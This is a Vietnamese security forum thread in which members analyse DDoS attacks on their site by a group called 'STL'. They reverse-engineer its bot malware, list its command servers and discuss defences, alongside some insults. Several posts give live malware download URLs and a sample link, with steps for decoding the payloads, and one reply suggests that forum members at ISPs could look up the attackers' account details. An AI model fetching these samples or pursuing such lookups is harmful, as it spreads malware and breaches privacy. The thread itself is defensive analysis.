@Anh PXMMRF: Bot của STL sử dụng các browser có sẵn trên máy để DDOS hở a ?
Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.
Theo em nghĩ, crawl cũng chỉ là 1 quá trình duyệt 1 website, parse nội dung HTML của trang đó, và lấy hết những href link trong trang, rồi tiếp tục request đến các href link đó thôi mà ? @texudo: Hình như việc thay đổi User-Agent không liên quan đến việc server tạo ra thread khác đâu bạn.

Đúng như vậy, hay chính xác là tôi nghĩ như vậy. Các scenarios DDoS trước đây và ngay cả trong trường hơp Flash DDoS (hay còn gọi là X-Flash DDoS) vào HVA các năm trước đây, đều thông qua trình duyệt. Sự sử dụng các User Agent string trong các header của các gói tin DDoS vào mục tiêu và nhắm vào cổng HTTP 80 TCP là chứng cớ điển hình của quá trình DDoS thông qua trình duyệt Web. Khi đó trình duyệt sẽ liên tục kết nối với cổng 80 của webserver, đông thời mở rất nhiều thread (trên may client) khi kết nối Quá trình crawling trên một URL mục tiêu thì đúng như bạn nói. Chỉ có điều quá trình crawling không thưc hiện bằng manual (user click vao các link hiện diện trên URL) mà là tự động, khi check bảo mật một webserver hay khi DDoS với tốc độ chậm, châm mà sâu mà dễ gây quá tải (như anh conmale đã từng nói) Khi crawling tự đông thì máy của user cũng chiu tải năng và đăc biệt webserver cũng chịu tải rất nặng nên dễ crash. Vì sao? Vì trình duyệt của user phải mở liên tiếp nhiều URL khác nhau cùng một lúc. Còn webserver phai liên tục trong cùng một lúc chuyển nhiều URL lên cho trình quản lý web (Apache) để cho "hiện" ra tại máy user.. Việc đó làm tốn rất nhiều năng lưc (tài nguyên) của hệ thống trong một thời gian ngắn, hệ thống rất dễ quá tải hay buffer overflow. Cần phân biệt giữa file (hay process) download các file malicious image để update STL virus, như file Acrobatupdater.exe và file sẽ kich hoạt trình duyệt DDoS vào HVA. Khi RCE anh TQN cũng chưa nói rõ về file kích hoạt này. Còn trên máy thí nghiệm của tôi, như tôi đã nói, Acrobatupdater.exe không thể nào kết nối được với một master webserver nào của STL. Vì vậy tôi chưa có thông tin thưc tế về một process nào đó chịu trach nhiệm về việc kích hoạt trình duyệt DDoS vào HVA ((hoăc giả nó tự kết nối -DDoS vào HVA mà không thông qua trình duyệt). Mấy hôm nay con Acrobatupdater.exe lai chẳng chịu "active" nữa. Hì hì. Hôm trước có lúc Acrobatupdater.exe mở đến 50-60 thread kết nối với master. Đúng như em đã nói, User Agent string không có liên hệ gì với việc trình duyệt mở thread kết nối hay mở bao nhiêu thread.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sùng gan ông nội http://www.imageshack.us/ này quá, phải register và login vào mới xem được hình. Bà con có trang web nào upload hình mạnh, nhanh, lớn không, share cho em để em port hết mấy hình này qua !

Phân tích tính chất vài trận DDoS HVA vừa qua.

secmask — GMT

TQN wrote:

Sùng gan ông nội http://www.imageshack.us/ này quá, phải register và login vào mới xem được hình. Bà con có trang web nào upload hình mạnh, nhanh, lớn không, share cho em để em port hết mấy hình này qua !

Anh thử mấy cái hàng nội như http://uploadanh.com, http://up.anhso.net xem, không thì chơi photobucket tạm :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

ngo_nuong — GMT

Anh dùng tài khoản google và upload lên picasa cũng đc Có cái này upload và dùng khá tiện nhưng có cái là tiếng Đức :D www.abload.de Dịch qua google cũng ổn: http://translate.google.de/translate?hl=de&langpair=de|en&u=http://www.abload.de/

Phân tích tính chất vài trận DDoS HVA vừa qua.

McSteven — GMT

Em theo dõi Topic này lấu rồi! Em mong mọi người vạc trần bọn stl đó chứ để chúng làm những việc thật là bỉ ổi như vậy được! Và còn 1 câu để nói : Bọn STL là ai mà ai cũng biết mà không ai dám nói !

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Bà con có xem được hình không ? Cái picasa đó em up hình lên rồi, làm sao lấy link trực tiếp vậy ha ? 2 McSteven: cậu hỏi xong thì tự trả lời được rồi đấy, ở nơi khác thì em dám nói, còn ở đây thì em không dám nói, mắc công lại mang tội "vu cáo, nói xấu xxx" gì đó nữa !? :-( Cậu cứ đọc cho kỹ bài post ở trên của anh PXMMRF thì sẽ hiểu stl là của ai, do ai nuôi ! Tội nghiệp mấy anh stl quá ha, em cũng mệt mà mấy anh cũng mệt. Hồi chiều post mấy bài RE mấy con bmp của mấy anh, mấy anh đọc xong lật đật chạy vắt chân lên, config cho map.priper.info hoạt động lại ha =)) Bà con ơi, theo hướng dẫn của em ở trên, bà con nhanh tay download http://map.priper.info:8080/flower.bmp về, DecodeBmp.exe flower.bmp flower.bin ra, lấy link mới: http://map.priper.info:8080/fytqn613.bmp. Tiếp tục down http://map.priper.info:8080/fytqn613.bmp về, nhớ size = 0x06D200. DecodeBmp.exe fytqn613.bmp fytqn613.bin. fytqn613.bin cũng là file EXE. Nhưng cái EXE này không dùng kỹ thuật NullsoftInst string, overlay data để extract trong bụng nó ra SbieSvc.exe và SbieMgm.dll, mà nó dùng kỹ thuật gzip để nhúng PE, nên cái script DecodeBin.1sc của em sẽ không tìm ra ! Nhưng không sao, cái UIMemoryDump IDC script của em sẽ dump 2 ông nội zip này xuống disk và bà con unzip ra là xong, lòi ra cái file .exe và .dll mạo danh Sandboxie của stl. Cứ từ từ, nôn nóng "em nó sợ", sáng mai em sẽ post cách RE và extract hai ông nội zip embedded PE này ra. Bà con đón đọc nhé, giờ em buồn ngủ quá rồi ! PS: Mấy anh stl còn không lo đóng lại map.priper.info đi =)) Cứ chơi rượt đuổi với mấy anh hoài em thấy chán quá, mấy anh không có gì mới cả, quay đi quay lại vẫn 3 cái code, bot cũ đó. Bộ mấy anh không thấy chán à, hay "sếp" không cho mấy anh nghỉ ? Còn một loạt các blog "lề trái" đang hoạt động nên "sếp" bắt mấy anh phải DDOS các blog đó im miệng à ????

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Thử kiểm tra tình hình "tài sản" của stl cái coi ;) http://daily.openns.info:8080/flower.bmp (15.82.186.153): --> dead, no IP assigned. - Hosting & network: hp.com - Domain registrar: publicdomainregistry.com --> "CLIENT HOLD" violating terms and conditions. http://map.priper.info:8080/flower.bmp (208.115.200.206): --> still alive, running on 8080 - Hosting & network: limestonenetworks.com - Domain registrar: www.enom.com --> "CLIENT TRANSFER PROHIBITED" still alive http://net.iadze.com/backgrounds.jpg (178.32.95.119): --> still point to this IP but host suspended - Hosting & network: santrex.net & ovh.net - Domain registrar: www.enom.com --> "CLIENT TRANSFER PROHIBITED" still alive http://sec.seamx.net:8080/flower.bmp (15.82.186.153): --> dead, no IP assigned. - Hosting & network: hp.com - Domain registrar: www.sh3lls.net --> "SUSPENDED" violating terms and conditions. http://find.instu.net/fronts.jpg & http://find.instu.net/backgrounds.jpg (67.215.65.132): --> dead, no IP assigned. - Hosting & network: theplanet.com - Domain registrar: www.sh3lls.net --> SUSPENDED violating terms and conditions. http://second.dinest.net/xc.jpg & http://second.dinest.net/xv.jpg (46.166.147.48) --> dead, no IP assigned - Hosting & network: santrex - Domain registrar: www.lovingdomains.com --> SUSPENDED violating terms and conditions. http://speed.cyline.org:443/flower.bmp & http://speed.cyline.org:443/BlueSphere.bmp & http://speed.cyline.org:443/plxzyin0fx.bmp (178.33.143.57) --> still alive, running on 443 - Hosting & network: santrex - Domain Registrar: PublicDomainRegistry.com --> CLIENT TRANSFER PROHIBITED still alive. http://poxxf.com/flash.swf & http://poxxf.com/images.gif (174.142.132.186) --> dead, no IP assigned. - Hosting & network: iweb - Domain registrar: www.sh3lls.net --> SUSPENDED violating terms and conditions. http://paxds.com/flash.swf (178.162.225.253): offline - Hosting & Network: santrex - Domain Registrar: publicdomainregistry.com --> CLIENT TRANSFER PROHIBITED still alive. safebrowser.dyndns.org (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. --> vecebot (report at http://www.threatexpert.com/report.aspx?md5=dc56a98aaa75a66676becda742135a5b) safebrowsing.dyndns-blog.com (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. --> vecebot (report at http://www.threatexpert.com/report.aspx?md5=dc56a98aaa75a66676becda742135a5b) fastupdate.dyndns-office.com (204.13.248.126 - IP of dyndns.org): host is up, drop ICMP, open port 80. hot.enfaqs.com (172.16.13.17 - private IP block): offline securelogin.doomdns.com (no IP): offline tongfeirou.dyndns-web.com (89.149.202.104 - server86944.santrex.net): host is up, drop ICMP, open port 80. express.blogdns.info (91.211.118.119 - IP of 0x2a Ukraine): host is up, drop ICMP, open port 80. biouzhen.dyndns-server.com (78.110.24.85 - IP of Bellnet Malta): host is up, accepted ICMP, open port 80. maowoli.dyndns-free.com (78.110.24.85 - IP of Bellnet Malta): host is up, accepted ICMP, open port 80. Màu đỏ là teo, màu xanh là còn ngáp ngáp. "Thiệt hại" lớn nhất không phải là mấy cái "masters" bị teo, mấy con zombies bị teo khá bộn và bao nhiêu công sức gầy dựng bị tan nát không biết bao nhiêu mà kể mà ở chỗ, "underground" dần dần bị kéo lên mặt đất rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thiệt là mấy anh stl, cứ xào qua xào lại mấy cái code cũ đó hoài. Cách RCE nhanh các biến thể của stl: 1. Chịu khó bỏ công RCE 1 file của mấy anh stl cho tương đối, name, comment đầy đủ, vd như SbieSvc.exe và SbieMgm.dll ngày 04-08. 2. Hôm qua, mấy anh tung biến thể mới của SbieSvc.exe và SbieMgm.dll, sau khi extract ra hai file này từ fytqn613.bmp - fytqn613.bin, chúng ta mở file mới trong IDA, dùng PatchDiff plugin, chọn file idb cũ ở trên. 3. Theo kết quả PatchDiff: Identical Functions, ta copy name và comment từ old idb file qua new idb. 4. Bỏ Unmatched Functions, xem và view graph từng hàm trong Mached Functions.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Ái chà, hôm nay đẹp trời, các bạn stl lôi đâu ra một đống zombie để "đốt" HVA vậy? :-) . Tớ biết các bạn thù ghét HVA lắm. Mấy ai mà qua khỏi cái ngưỡng tham sân si?

Phân tích tính chất vài trận DDoS HVA vừa qua.

~simon~ — GMT

-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá. -Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mẫu Fake Sandboxie ngày 17-08-2011 của stl em đã up lên ở đây http://www.mediafire.com/?5w2rrwd08b8bg8r Vẫn connect tới net.iadze.com để lấy mệnh lệnh DDOS, nhưng không lấy backgrounds.jpg mà là http://net.iadze.com/showthread.php. Các bạn xem trong file tracker.cmd sẽ thấy các link của nó. File monitor.cmd để em run và capture traffic của SbieMgm_patched.dll Quay đi quay lại vẫn bao nhiêu đó, mấy anh cứ thêm mắm, thêm muối, bớt đường, bớt bột ngọt, nhưng cuối cùng, chung quy cũng một món SbieMgm.dll đó à ! Em chán re code của mấy anh quá rồi :-( Em đang tìm mẫu bot đang "đốt" HVA ta, bà con nào có share em với. Đổi gió một chút =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Ái chà, các bạn stl làm sao mà nhiễm được một loạt IP của Singtel (Singapore) vậy cà? :-). Các bạn muốn triệt HVA mà cứ lôi mấy con bot cũ mèm như vậy ra để xào nấu hoài thì làm sao mà được? TQN và tớ đã mớm mớm nhiều điểm mà các bạn cứ loay hoay xào với nấu mãi mấy cái hàm không biết để làm chi. Rốt cuộc cũng bấy nhiêu thôi các bạn à.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Các bác STL đẻ ra nhiều đứa con hoang quá, nay chúng thất tán khắp nơi, từ Nam chí Bắc Việt nam, đến tận Mỹ, Đại hàn, Châu Phi, Lào.... Mới đây lại thấy chúng ở Sing nữa. Nhiều con quá, nên chẳng còn nhớ hết tên chúng, cũng không biết đứa nào ở đâu, để goi chúng về nhà. Nhiều đứa con nay thấy bơ vơ, không biết tìm bố mẹ nơi nào. Có lúc bố chỉ đường về nhà, nhưng về đến nơi thì nhà đã dọn đi chỗ khác mất rồi. Không ít đứa cả mấy tháng nay chẳng thấy ai gọi tới, không đươc cung cấp "thưc phẩm", tiền bạc, nên sắp chết đói hết rồi. Tình thế quả là rối bời bời. Hì hì!

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

anh TQN, conmale, PXM,... này làm cho nguyên 1 đám STL từ trên xuống dưới đứng ngồi không yên. ăn cũng nhai ko nổi với TQN, ngủ cũng gặp ác mộng với TQN. ==> Fa Film Việt Nam phát hành, bộ phim : Sống trong sợ hãi xin đc phép bắt đầu. "Nghiệt do ai gây ra thì người đó nhận. "

Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar — GMT

Phì cười, em thấy chính các bác Admin cũng mất thời gian cho việc này, hiển nhiên là ảnh hưởng đến công việc chính của mình. Thực sự các bác nghĩ công việc chính của các bác là sống chết với HVA này ?. Các bạn STL kia thì công việc chính của các bạn ấy là phá hoại rồi, em thấy công sức các bạn ấy bỏ ra để phá hoại có khi không nhiều hơn công sức các bác bỏ ra để phòng chống.

Phân tích tính chất vài trận DDoS HVA vừa qua.

raulgonzalez — GMT

~simon~ wrote:

-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá. -Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên :))

Các bạn cứ thoải mái phê phán hành vi của stl. Các bác nào có tài thì góp sức với anh TQN với conmale để vạch mặt đám này. Nhưng đừng khiêu khích theo kiểu "còn lâu mới làm gì được HVA", nhất là khi mình không nằm trong BQT.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

eicar wrote:

Phì cười, em thấy chính các bác Admin cũng mất thời gian cho việc này, hiển nhiên là ảnh hưởng đến công việc chính của mình. Thực sự các bác nghĩ công việc chính của các bác là sống chết với HVA này ?. Các bạn STL kia thì công việc chính của các bạn ấy là phá hoại rồi, em thấy công sức các bạn ấy bỏ ra để phá hoại có khi không nhiều hơn công sức các bác bỏ ra để phòng chống.

Mình thấy có vẻ pác là người bận rộn, lo lắng đến bản thân hơi nhiều. Ở đây mọi người quan tâm đến diễn đàn mình hoạt động (học hỏi, trao đổi ...) nên mới cùng tham gia. Còn nói về "các bác Admin" thì việc "bỏ công sức" cũng đâu có gì là quá "rảnh", vì đối với "Admin", thì website của mình cũng chính là niềm vui, đứa con tinh thần của mình. Vả lại trong quá trình điều tra, bỏ ra công sức trong thời gian này mọi người cũng học được nhiều thứ. Không có gì là phí phạm và "Phì cười" cả :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar — GMT

Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

hoangtiepvu — GMT

eicar wrote:

Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi.

:) STL chắc chắn ko những cay cú mà là cực kỳ cay cú có khi còn hơn -:-) kiểu như bạn muốn phá ai đó ko cho người đó thăng chức (chẳng hạn) mà người đó ko những ko bị sao mà thăng chức ầm ầm và sọc xiên lại bạn ! chắc bạn cũng bt đón nhận thôi nhỉ -:-) :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

eicar wrote:

Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi.

Bạn có giỏi hoặc thích thảo luận về kỹ thuật thì ý kiến ý kò đừng ý kiến kiểu này. Bạn có biết thái độ của STL là gì không?Hay bạn là bạn của STL? Lặn đi cho nước nó trong.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

eicar wrote:

Thôi, em biết nói thế này thể nào các bác cũng xông vào chém, đã không giúp được gì lại còn thích phá thối. Nhưng thật ra là về sau em thấy các bác hơi cay cú, tất nhiên là cay cú cũng phải khi gặp các bạn phá hoại chuyên nghiệp thế này. Nhưng thái độ các bạn STL thế nào, các bác có biết được đâu, nên cứ tự bàn luận rồi tự sướng thế này em thấy gai mắt thì có ý kiến thôi.

...Các bác ấy không biết được STL, tôi không biết, bạn không biết, thế thì sao? Đây là diễn đàn với tâm huyết của những quản trị, bạn biết là bạn không giúp gì được, đã vậy coi ké mà vẫn to mồm...Họ bảo vệ tâm huyết của họ, họ có cay cú, có giận dữ, có gì đi nữa thì sao? Bạn gai mắt thì mời bạn đi chỗ khác. Kẻo mọi người gai mắt thì bạn sẽ thấy nhiều thứ hơn những gì tôi viết ở đây. Không bỏ công thì đừng lên tiếng, lên tiếng thì kéo mặt xuống đất mà che cũng không kịp đâu nha. :-) Đã vào đây, xin bạn tôn trọng những người bỏ thời gian và công sức để bảo vệ nơi này. Cảm ơn. Mình cũng rảnh mồm, và thấy bạn viết rất gai mắt đó. :-) Và không phải riêng mình, nên bạn có lẽ nên lặn đi nhé. ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

~simon~ wrote:

-Xin lỗi chứ em không gọi là bạn được ,từ này em gọi bọn stl là bọn địch chắc đang ức chế lắm khi HVA vẫn trơ như tượng đá. -Cũng có lẽ cấp trên chỉ thị mấy chú không hạ được HVA thì tháng này cắt luơng cũng nên :))

@~simon~ : nói hay quá kơ, đùng foc' ý mình hì hì. thương mấy "anh" stl quá mà ứ biết các anh đâu để iem gởi tặng mấy thùng mì tom loại miliket có hình "một lũ lợn" he he . em đời sống khó khăn, bận chăn chu kắt kỏ + công việc đồng áng suốt ngày vậy mà nghe anh TQN giải mã RC, anh conmale anh hùng xung chận, oánh đông dẹp bắc giảm tải server, anh PXMMRF thì forensic truy tìm thủ phạm .v.v. cả nước hồi hộp, bốn bể mong chờ . ôi hay như film trinh thám . thật tuyệt vời nên em bỏ cả ruộng vườn lên theo dõi suốt ngày. hay ghê cơ. chúc các anh sức khoẻ để chiến đấu với các "anh" slt nha. chụt chịt moak :-* -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity — GMT

Em thấy các bác nên nghiêng về kỹ thuật chút , tuy đọc không hiểu mấy mà thấy a TQN vừa phân tích vừa vạch trần STL thấy cũng thú vị , ngày nào cũng phải lên coi "update tin tức" :P. P/S VietNamNet vào 23h15 e thấy chậm quá , chắc đang bị đấm túi bụi .

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

insanity wrote:

Em thấy các bác nên nghiêng về kỹ thuật chút , tuy đọc không hiểu mấy mà thấy a TQN vừa phân tích vừa vạch trần STL thấy cũng thú vị , ngày nào cũng phải lên coi "update tin tức" :P. P/S VietNamNet vào 23h15 e thấy chậm quá , chắc đang bị đấm túi bụi .

ơ hay cái bác này lạ nhở :D ( mắng êu tí :P). a) bác download các con virus của bon stl về (các anh quản lý đã cho link từ đời nào rùi mà ) b) bác decode chúng ra (rce) xem xem bọn viruts đó có hành động dog ( em nhầm ddos ) như thế nào ?? cách thay đổi User Agents và fake Uagent ra sao để lừa hệ thống lọc của HVA .và update các lệnh từ con "master webserver" nào chứa bọn các pigs chờ của bọn stl. c) bác download các loại tranh ảnh pigs chờ của đám "mèo què, mèo mù, mèo trột" stl về ..lại RC nó ra mà xem cái lõi nó viết gì và mục đích gì? ra lệnh kết nối ra làm sao để bọn vitut' mèo què ddog HVA ? d) từ đó bác biết được "master webserver" nuôi dưỡng bọn pigs => bác biết được thông tin của con server đó nằm ở đâu bằng ba cái lệnh cơ bản và nâng cao, hoặc SE của riêng bạn d) đó ..câu chuyện chỉ có thế của đám mèo què stl thế thôi. mỗi ngày bọn chúng có thể (mà khả năng ít lắm ) ngồi bóp chim nhau, hoặc tự tay póp dái cố vắt cái óc đậu phụ của bọn chúng xem có thiết kế được kiểu ...fa' hoại nào khác ko ?? ho' ho' . e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P -> luu ý thì các anh TQN,conmale, PXMMRF cung da lưu ý rùi, minh xin nhắc lại là có làm gì với đám vitut' kia thi cân thận ko lại ...tự ddos HVA lúc nào ứ biết :P tèo teo .. f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà . -:|- iêu bạn và ôm các anh HVA -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

kutruoi wrote:

e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P

Câu "nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ...." nghe có cứ ................. :D Đọc kỹ sẽ thấy anh nói hết rồi mà. - Cách triệt để nhât là phải tiêu diệt nguồn DDoS trước khi nghĩ đến biện pháp chống -> cái này thuộc về anh TQN và các anh em khác bằng cách RCE code Virus của STL và gửi report đến các hãng diệt virus -> Diệt được vô số Bot. nếu có 10 con thì diệt được 9 hoặc 8 con là đã giúp cho HVA giảm được 80%. - Sử dụng thêm 1 Server ở EU có băng thông 1 Gbps <-- cái này khá tốt. tác dụng thì khỏi phải bàn, còn về việc load balance thì cũng giống như trước đây HVA chạy 2 server, 1 ở JAPAN và 1 ở US. - HVA không hack các server khác. vì anh conmale không thích "break laws". vì thế nên có thể là đã viết email contact với bên cung cấp dịch vụ của STL. Còn thêm các biện pháp chống khác thì với chúng ta thì với điều kiện đang có nếu Sờ Ti Lợn tấn công vào thì chắc cũng chỉ nằm yên đợi chết hoặc trông chờ vào Government ;-) ? chứ không có đủ điều kiện để kiếm đâu ra nhiều server khủng và đặt nhiều nơi trên thế giới như HVA. Phần cản lọc chắc là liên hệ với ISP có quyền và khả năng. vì giả sử cái server con con của chúng ta mà bị DDoS có set firewall cho Deni hết hay Ban hết mấy cái IP thì đống Bot kia nó cứ DDoS vào chắc cũng bị "ngập". nên chắc phải liên hệ và có sự giúp đỡ của ISP.

kutruoi wrote:

f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà .

Bọn STL này là 1 nhóm code. vì vậy nhiều thằng code thối lắm. vì thế nên có đọc code cũng khó lắm mà biết được thằng nào code. không thể có được mấy chục % nhờ RCE code của bọn này. vì nếu tôi code 1 chương trình thế nào thì thằng bạn tôi học cùng thầy giáo cũng sẽ code gần giống thậm chí code giống như vậy, ngoài ra đa số STL đều lên mạng lấy code về đạo đạo, nên có thể thấy mấy thằng này không có tư duy, mà code theo kiểu chắp chắp vá vá như vá áo rách chứ không may hẳn từ đầu đến cuối 1 cái áo. Có thêm vụ có IP của STL nữa + thành viên của HVA rất đông, chắc chắn có người làm cho các ISP lớn nên chắc không khó để có chính xác thông tin của tài khoản đăng ký ADSL đó. từ đó cũng có thể lần ra được vô số. vì các thông tin cung cấp public trên đấy chỉ là 1 phần nhỏ, chứ không phải tất cả các thông tin mà các anh thu thập được đều post lên đây hết

Phân tích tính chất vài trận DDoS HVA vừa qua.

eicar — GMT

Em xin rút lại những lời đã nói ở bài viết đầu tiên, đúng là vào đâu thì nên tôn trọng những người đã bỏ công ra bảo vệ nơi đấy. Em xin lỗi các bác Admin vì đã ăn nói không đúng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

phanledaivuong wrote:

kutruoi wrote:

e) quan trọng là nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ....né đòn ra làm sao ?hì hì. làm sao để balance server ? ( ví dụ như config rounter nhu' the' nao? mo rong bang thong ? thay doi policies can, loc .v.v. contact , hoac dap chet bon master server kia ra sao ? fan ung' nhanh cần fai? lam gi ? abc..v.v.v ) ui, cái này khó và hay lắm anh kể cho tui em nghe nha anh . :P
Câu "nếu anh conmale có quý chúng mình thì xin anh hãy mau mau chỉ cho tụi em biết cách anh ...." nghe có cứ ................. :D Đọc kỹ sẽ thấy anh nói hết rồi mà. - Cách triệt để nhât là phải tiêu diệt nguồn DDoS trước khi nghĩ đến biện pháp chống -> cái này thuộc về anh TQN và các anh em khác bằng cách RCE code Virus của STL và gửi report đến các hãng diệt virus -> Diệt được vô số Bot. nếu có 10 con thì diệt được 9 hoặc 8 con là đã giúp cho HVA giảm được 80%. - Sử dụng thêm 1 Server ở EU có băng thông 1 Gbps <-- cái này khá tốt. tác dụng thì khỏi phải bàn, còn về việc load balance thì cũng giống như trước đây HVA chạy 2 server, 1 ở JAPAN và 1 ở US. - HVA không hack các server khác. vì anh conmale không thích "break laws". vì thế nên có thể là đã viết email contact với bên cung cấp dịch vụ của STL. Còn thêm các biện pháp chống khác thì với chúng ta thì với điều kiện đang có nếu Sờ Ti Lợn tấn công vào thì chắc cũng chỉ nằm yên đợi chết hoặc trông chờ vào Government ;-) ? chứ không có đủ điều kiện để kiếm đâu ra nhiều server khủng và đặt nhiều nơi trên thế giới như HVA. Phần cản lọc chắc là liên hệ với ISP có quyền và khả năng. vì giả sử cái server con con của chúng ta mà bị DDoS có set firewall cho Deni hết hay Ban hết mấy cái IP thì đống Bot kia nó cứ DDoS vào chắc cũng bị "ngập". nên chắc phải liên hệ và có sự giúp đỡ của ISP.
kutruoi wrote:

f) việc liên đới bọn stl này với những thông tin và thông số kỹ thuật, thậm chí cả cách code và loại tư tưởng mà bạn dò được, thế là mình có mấy chục % hiểu và biết bọn sư tổ lợn ( stl ) là ai mà .
Bọn STL này là 1 nhóm code. vì vậy nhiều thằng code thối lắm. vì thế nên có đọc code cũng khó lắm mà biết được thằng nào code. không thể có được mấy chục % nhờ RCE code của bọn này. vì nếu tôi code 1 chương trình thế nào thì thằng bạn tôi học cùng thầy giáo cũng sẽ code gần giống thậm chí code giống như vậy, ngoài ra đa số STL đều lên mạng lấy code về đạo đạo, nên có thể thấy mấy thằng này không có tư duy, mà code theo kiểu chắp chắp vá vá như vá áo rách chứ không may hẳn từ đầu đến cuối 1 cái áo. Có thêm vụ có IP của STL nữa + thành viên của HVA rất đông, chắc chắn có người làm cho các ISP lớn nên chắc không khó để có chính xác thông tin của tài khoản đăng ký ADSL đó. từ đó cũng có thể lần ra được vô số. vì các thông tin cung cấp public trên đấy chỉ là 1 phần nhỏ, chứ không phải tất cả các thông tin mà các anh thu thập được đều post lên đây hết

@phanledaivuong : cảm ơn anh nhìu vì đã cho em thêm ý kiến nha anh @eicar : hoan hô bạn, vì đã biết, và dám nhìn nhận và xin lỗi . mình tin bạn sẽ thành công. chúc bạn nhiều may mắn nha.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

@ kutruoi Chi tiết bảo mật của HVA không thể công bố rộng rãi ngay lúc này bởi vì lý do quá hiển nhiên :P. Tuy nhiên tớ cũng có thể tổng quát hoá một số điểm nền tảng như sau: 1. Băng thông: Để giảm thiểu tình trạng bão hoà băng thông, HVA mở ra thêm 2 nhánh: Nhật và Đức. Cả hai nhánh này không cần CPU quá nhanh, memory quá nhiều mà chỉ cần băng thông tốt. Tổng cộng 3 nhánh của HVA có 2.1Gbit nhưng điều quan trọng là requests để "đốt" HVA bị chẻ ra do DNS round robin. Bởi vậy, chẳng khi nào có nhánh nào bị ngập lụt. Hơn nữa, để điều động một botnet thường xuyên có khả năng dội > 2Gbit là chuyện không đơn giản. Hiện nay, theo đo đạt thì botnet của stl nằm ở tầm 5Mbit vì khá nhiều zombies đã đi về cõi.. vĩnh hằng :-) . 2. Giới hạn requests: Tất cả những cú DDoS thông thường là trông chờ vào trường độ và cường độ. Trường độ thì khó kiểm soát vì zombies có thể bị shutdown bất cứ lúc nào (người dùng tắt máy chẳng hạn) nhưng cường độ thì có thể thực hiện bằng cách gởi càng nhiều requests càng nhanh thì càng tạo cường độ. Mặt tiêu cực của biện pháp trở nên hiển nhiên bởi vì những anh nào mà đập càng nhanh vô HVA thì càng đích thị là DDos ---> /dev/null. 3. Giới 